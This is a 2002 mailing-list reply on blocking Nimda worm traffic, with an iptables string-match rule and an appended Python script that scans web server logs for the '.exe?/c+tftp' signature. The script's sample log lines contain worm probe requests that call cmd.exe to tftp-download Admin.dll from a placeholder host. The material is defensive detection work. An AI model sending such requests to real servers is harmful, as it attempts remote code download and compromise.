Re: Iptables and a web server


Subject: Re: Iptables and a web server
From: James Zuelow (jamesz@ideafamilies.org)
Date: Tue Apr 23 2002 - 11:40:13 AKDT


----- Original Message -----
From: "Mike Barsalou" <mbarsalou@aidea.org>
To: <aklug@aklug.org>
Sent: Tuesday, April 23, 2002 11:22 AM
Subject: Iptables and a web server

>
> Then I want to reject it at the firewall? Is this better done at the
> webserver? I just didn't want any traffic inside my net that wasn't
> supposed to be there.
>
>
> BTW, I am using iptables.
>
> Mike
>
iptables will normally just look at the IP and port numbers - so the URL
won't be important. However, you can use an experimental
string-matching patch. The only use I've seen of that is for Nimda:

iptables -t filter -A INPUT -i $EXT_IFACE -p tcp \
   -d $IP --dport http -m string \
   --string ".exe?/c+tftp" -j DROP

quoted from SysAdmin Magazine (
http://www.samag.com/documents/s=1824/sam0201h/0201h_s1.htm ). Note
that I don't know where the patch is - the last time I made a kernel I
didn't pay attention to the iptables setup so I don't know if it is
something you can just make a module for, or if you have to patch your
kernel source beforehand.

Personally I would do url filtering at the web server. If the extra
port 80 stuff is a problem for your internal network, maybe a DMZ is the
best solution.

Cheers,

James
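As an added illustration of the "filter at the web server" approach (this is example code, not part of James's post or the SysAdmin article): a Python script that scans Apache common-log lines, percent-decodes each request path, and flags requests carrying the same ".exe?/c+tftp" signature used in the iptables rule above. The log lines are constructed samples, not captured traffic.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache Common Log Format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Apr/2002:11:22:01 -0800] "GET /index.html HTTP/1.0" 200 1043
192.0.2.77 - - [23/Apr/2002:11:22:03 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20192.0.2.77%20GET%20Admin.dll HTTP/1.0" 404 276
192.0.2.77 - - [23/Apr/2002:11:22:04 -0800] "GET /c/winnt/system32/cmd%2Eexe?/c+tftp HTTP/1.0" 404 276
198.51.100.5 - - [23/Apr/2002:11:22:09 -0800] "GET /images/logo.gif HTTP/1.0" 200 2310
"""

# Common Log Format: host ident user [time] "method path protocol" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Same signature as the firewall rule on the page, applied to the decoded
# request path instead of raw packet bytes.
NIMDA_SIGNATURE = ".exe?/c+tftp"

def parse_clf(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None

def is_nimda_probe(path):
    # Percent-decode so "%2Eexe" and ".exe" compare equal. unquote (not
    # unquote_plus) is used because '+' is a literal character in a path.
    return NIMDA_SIGNATURE in unquote(path)

def find_probes(log_text):
    """Return (host, decoded_path, status) for every request matching the signature."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec and is_nimda_probe(rec["path"]):
            hits.append((rec["host"], unquote(rec["path"]), int(rec["status"])))
    return hits

def probes_per_host(log_text):
    """Count matching requests by source host, useful for picking what to block."""
    return Counter(host for host, _, _ in find_probes(log_text))

if __name__ == "__main__":
    for host, path, status in find_probes(SAMPLE_LOG):
        print(f"{host} {status} {path}")
    print(dict(probes_per_host(SAMPLE_LOG)))
```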
